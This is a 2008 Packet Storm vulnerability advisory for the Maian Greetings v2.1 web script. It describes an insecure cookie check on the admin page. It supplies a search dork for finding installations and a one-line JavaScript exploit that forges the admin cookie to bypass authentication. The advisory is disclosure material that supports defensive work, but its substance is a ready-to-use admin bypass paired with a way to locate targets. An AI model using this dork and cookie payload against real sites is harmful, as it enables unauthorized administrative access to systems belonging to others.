maiangreetings-cookie.txt

2008-07-15T00:00:00
ID PACKETSTORM:68158
Type packetstorm
Reporter Saime
Modified 2008-07-15T00:00:00

Description

                                        
                                            `Author: Saime  
Date: July 12, 2008  
Script: Maian Greetings v2.1 Insecure Cookie Handling Vulnerability  
URL: http://www.maianscriptworld.co.uk  
Dork: Powered by: Maian Greetings v2.1  
  
Description:  
Maian Greetings v2.1 is suffering from insecure cookie handling, the /admin/index.php only checks if cookie mecard_admin_cookie,  
equals admin username.  
  
Exploit:  
javascript:document.cookie = "mecard_admin_cookie=admin; path=/php/demos/greetings/admin/"  
  
`